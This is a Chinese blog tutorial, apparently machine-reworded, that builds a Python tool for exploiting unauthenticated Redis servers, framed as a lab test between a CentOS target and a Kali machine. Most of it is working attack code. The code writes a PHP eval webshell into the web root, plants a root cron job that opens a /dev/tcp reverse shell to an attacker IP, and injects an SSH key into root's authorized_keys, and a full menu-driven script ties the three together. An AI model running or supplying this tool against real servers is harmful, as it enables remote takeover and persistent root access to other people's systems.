使用python脚本实现Redis未授权访问检测

2024-11-4 22:29| 发布者: db4d5a85| 查看: 117| 评论: 0

摘要: 目次1 测试情况准备2 未授权访问检测3 写入webshell4 建立反弹毗连5 SSH keys 免密登录6 完备代码7 测试效果 webshell1 测试情况准备 CentOS 7（192.168.198.66/24）：安装 Redis 服务器并用 root 权限开启服务，关

1 测试情况准备

CentOS 7（192.168.198.66/24）：安装 Redis 服务器并用 root 权限开启服务，关闭掩护模式；安装并开启 httpd 服务；开启 ssh 服务。

Kali（192.168.198.172/24）：测试脚本效果，模仿攻击机。

Win10：VS Code开辟脚本，Xshell控制假造机。

2 未授权访问检测

起首需要检测 6379 端口是否开启，直接使用 socket 毗连测试即可，is_port_open() 函数实现检测端口开启情况。

[code]def is_port_open(host,port): s=socket.socket() s.settimeout(0.3) try: s.connect((host,port)) except Exception as e: return False else: return True finally: s.close()[/code]

然后尝试毗连 Redis 服务器，这里用到redis模块中的StrictRedis(host,port,socket_timeout)，通过client_list() 方法获取客户列表查看是否毗连成功。假如成功毗连到 Redis 服务器， client_list() 的调用就不会抛出异常。

[code]try: client = redis.StrictRedis(host=ip, port=port, socket_timeout=0.3) ok_lst = client.client_list() print('[+] Connected to the Redis server successfully...') except Exception as e: print(f'[-] An unexpected error occurred: {e}')[/code]

3 写入webshell

Redis下令：

[code]config set dir /var/www/html config set dbfilename shell.php set x "<?php @eval($_POST[123]); ?>" save[/code]

对应的 redis 模块的方法：

[code]client.config_set('dir','/var/www/html') client.config_set('dbfilename','shell.php') client.set('x','<?php @eval($_POST[123]); ?>') client.save()[/code]

增加设置根目次一句话木马名称和暗码功能：

[code]def Webshell(client): try: df_dir='/var/www/html' web_dir=input('Please enter the root directory of the target machine\'s website, input nothing to use the default path: /var/www/html\n') web_dir=web_dir.strip() if not web_dir: web_dir=df_dir name=input('Please enter the name of the PHP file you want to upload: ') passwd=input('Please enter the connection password: ') client.config_set('dir',web_dir) client.config_set('dbfilename',name+'.php') client.set('x','<?php @eval($_POST['+passwd+']); ?>') client.save() print("[+] Webshell "+name+".php"+" uploaded successfully...") except Exception as e: print(f"[-] Webshell upload failed: {e}")[/code]

4 建立反弹毗连

同理，这里利用定时使命实现反弹毗连。先设置 Redis 数据库目次到体系定时使命目次，名字设置为 root （相称于修改 root 用户的定时使命），增加用户设定 IP 和端口监听功能。

[code]def Reverse(client): try: client.config_set('dir','/var/spool/cron') client.config_set('dbfilename','root') ip=input('Set the attacker\'s IP address: ') port=input('Set the listening port: ') payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n' client.set('x',payload) client.save() print("[+] Reverse shell task created successfully...") except Exception as e: print(f"[-] Reverse shell creation failed: {e}")[/code]

5 SSH keys 免密登录

把 Redis 的目次设置为 /root/.ssh，生存文件为 authorized_keys，实现在靶机中 authorized_keys 写入攻击者 ssh 公钥。

[code]def Ssh(client): try: sshkey=input('Enter the SSH key you have generated: ') client.config_set('dir','/root/.ssh') client.config_set('dbfilename','authorized_keys') client.set('x','\n\n'+sshkey+'\n\n') client.save() print("[+] SSH key injected successfully.") except Exception as e: print(f"[-] SSH key injection failed: {e}")[/code]

6 完备代码

[code]import numpy as np import socket import redis import sys def Hello_FK_Redis(): a,b=60,30 x,y,r=30,15,13 img=np.zeros((b,a),dtype=str) for i in range(b): for j in range(a): dist=np.sqrt((i-y)**2+(j-x)**2) if r-1<dist<r+1: img[i,j]='*' elif abs(j-x)<1 and dist<r: img[i,j]='|' elif abs(i-y)<1 and dist<r: img[i,j]='-' img[img=='']=' ' for i in img: print(''.join(i)) print('----Welcome to use Redis Vulnerability Exploitation Tool----') def is_port_open(host,port): s=socket.socket() s.settimeout(0.3) try: s.connect((host,port)) except Exception as e: return False else: return True finally: s.close() def Webshell(client): try: df_dir='/var/www/html' web_dir=input('Please enter the root directory of the target machine\'s website, input nothing to use the default path: /var/www/html\n') web_dir=web_dir.strip() if not web_dir: web_dir=df_dir name=input('Please enter the name of the PHP file you want to upload: ') passwd=input('Please enter the connection password: ') client.config_set('dir',web_dir) client.config_set('dbfilename',name+'.php') client.set('x','<?php @eval($_POST['+passwd+']); ?>') client.save() print("[+] Webshell "+name+".php"+" uploaded successfully...") except Exception as e: print(f"[-] Webshell upload failed: {e}") def Reverse(client): try: client.config_set('dir','/var/spool/cron') client.config_set('dbfilename','root') ip=input('Set the attacker\'s IP address: ') port=input('Set the listening port: ') ip=ip.strip() port=port.strip() payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n' client.set('x',payload) client.save() print("[+] Reverse shell task created successfully...") except Exception as e: print(f"[-] Reverse shell creation failed: {e}") def Ssh(client): try: sshkey=input('Enter the SSH key you have generated: ') client.config_set('dir','/root/.ssh') client.config_set('dbfilename','authorized_keys') client.set('x','\n\n'+sshkey+'\n\n') client.save() print("[+] SSH key injected successfully.") except Exception as e: print(f"[-] SSH key injection failed: {e}") if __name__ == '__main__': Hello_FK_Redis() ip=input('Please enter the target machine\'s IP address: ') port=6379 if is_port_open(ip,port): print('[+] Port 6379 is open...') print('[*] Trying to connect Redis server...') try: client=redis.StrictRedis(host=ip,port=port,socket_timeout=0.3) ok_lst=client.client_list() print('[+] Connected to the Redis server successfully...') print('Please choose the exploit method you want to use:\nEnter 1 for webshell\nEnter 2 for establishing a reverse connection\nEnter 3 for SSH key-based authentication\nOr any other character to exit...') try: c=int(input()) if c==1: Webshell(client) elif c==2: Reverse(client) elif c==3: Ssh(client) else: print('[*] Exiting...') sys.exit() except Exception: print('[*] Exiting...') sys.exit() except Exception as e: print(f'[-] An unexpected error occurred: {e}') else: print('[-] Port 6379 is not open...') [/code]